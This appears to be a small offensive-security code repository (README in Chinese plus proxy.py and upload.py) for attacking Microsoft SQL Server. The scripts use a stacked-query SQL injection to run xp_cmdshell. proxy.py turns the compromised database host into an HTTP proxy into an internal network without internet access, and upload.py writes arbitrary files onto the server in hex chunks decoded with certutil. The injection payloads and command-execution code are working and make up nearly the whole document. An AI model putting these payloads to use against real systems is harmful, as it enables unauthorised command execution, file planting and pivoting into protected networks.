├── README.md
├── proxy.py
└── upload.py


/README.md:
--------------------------------------------------------------------------------
1 | # MSSQLProxy
2 | 一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本，用于在站酷分离且不出网SQL注入进行代理
3 | # 其他
4 | 1. upload.py 能够方便的通过SQL注入上传文件
5 | 2. proxy.py 能够进行代理，但是在使用前记得更改 `exec_xp_cmdshell` 函数里的注入方法，根据自己的注入点灵活变通
6 | # TODO
7 | - [ ] 支持 `HTTPS` 代理
8 | - [ ] 支持 `Socks` 代理
9 | 


--------------------------------------------------------------------------------
/proxy.py:
--------------------------------------------------------------------------------
 1 | import base64
 2 | import binascii
 3 | import requests
 4 | from flask import Flask, request, make_response
 5 | import re
 6 | 
 7 | regex = 'MSSQL Proxy(.+?)MSSQL Proxy'
 8 | script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"
 9 | app = Flask(__name__)
10 | 
11 | 
12 | def exec_xp_cmdshell(cmd):
13 |     url = 'http://10.37.129.4/sql.php'
14 |     payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
15 |         cmd.encode()).decode()
16 | 
17 |     requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"})
18 |     requests.post(url, data={"id": payload})
19 | 
20 |     res = requests.post(url, data={
21 |         "id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN"
22 |     })
23 |     return ''.join(re.findall(regex, res.text))
24 | 
25 | 
26 | def send_package(ip, port, data):
27 |     cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format(
28 |         script_path=script_path, ip=ip, port=port, data=data
29 |     )
30 |     print(cmd)
31 |     return exec_xp_cmdshell(cmd)
32 | 
33 | 
34 | def clean_up_response(response):
35 |     response = binascii.unhexlify(response.strip().encode()).decode()
36 |     headers = response.split('\r\n\r\n')[0]
37 |     body = '\r\n\r\n'.join(response.split('\r\n\r\n')[1:]).strip()
38 |     res = make_response(body)
39 |     res.status = ' '.join(headers.split('\r\n')[0].split(' ')[1:])
40 |     for header in headers.split('\r\n')[1:]:
41 |         res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:])
42 |     return res
43 | 
44 | 
45 | @app.before_request
46 | def before_request():
47 |     if request.method == 'CONNECT':
48 |         return
49 |     package = '{method} {path} {version}\r\n'.format(
50 |         method=request.method,
51 |         path=request.full_path,
52 |         version=request.environ['SERVER_PROTOCOL']
53 |     ).encode()
54 |     host = ''
55 |     for k, v in dict(request.headers).items():
56 |         if k.upper() == 'Connection'.upper():
57 |             package += b'Connection: close\r\n'
58 |             continue
59 |         if k.upper() == 'HOST':
60 |             host = v
61 |         package += '{k}: {v}\r\n'.format(k=k, v=v).encode()
62 |     package += b'\r\n'
63 |     package += request.stream.read()
64 |     # print(package)
65 |     if not host:
66 |         return "HostNotFound\r--MSSQL Proxy"
67 |     if len(host.split(':')) > 1:
68 |         ip, port = host.split(':')
69 |     else:
70 |         ip, port = host, 80
71 |     response = send_package(ip, port, base64.b64encode(package).decode())
72 |     if response.strip() == 'FAILED':
73 |         return "Failed\r--MSSQL Proxy", 902
74 |     return clean_up_response(response)
75 | 
76 | 
77 | if __name__ == '__main__':
78 |     app.run(debug=True, host='0.0.0.0', port=4000)
79 | 


--------------------------------------------------------------------------------
/upload.py:
--------------------------------------------------------------------------------
 1 | import binascii
 2 | import sys
 3 | import requests
 4 | 
 5 | 
 6 | def exec_xp_cmdshell(cmd):
 7 |     url = 'http://10.37.129.4/sql.php'
 8 |     payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
 9 |         cmd.encode()).decode()
10 |     requests.post(url, data={"id": payload})
11 | 
12 | 
13 | def main():
14 |     if len(sys.argv) < 3:
15 |         print("Usage: python3 upload.py local_file_to_read remote_path_to_save")
16 |         sys.exit(1)
17 | 
18 |     cmd = '''>>"{path}" set /p="{content}"<nul'''
19 |     file = open(sys.argv[1], 'rb')
20 |     path_to_save = sys.argv[2]
21 |     exec_xp_cmdshell('cd . > "{}"'.format(path_to_save + '.tmp'))
22 |     while 1:
23 |         content = file.read(512)
24 |         payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode())
25 |         exec_xp_cmdshell(payload)
26 |         if len(content) < 512:
27 |             break
28 |     exec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save))
29 |     exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp'))
30 |     print('Uploaded successfully!')
31 | 
32 | 
33 | if __name__ == '__main__':
34 |     main()
35 | 


--------------------------------------------------------------------------------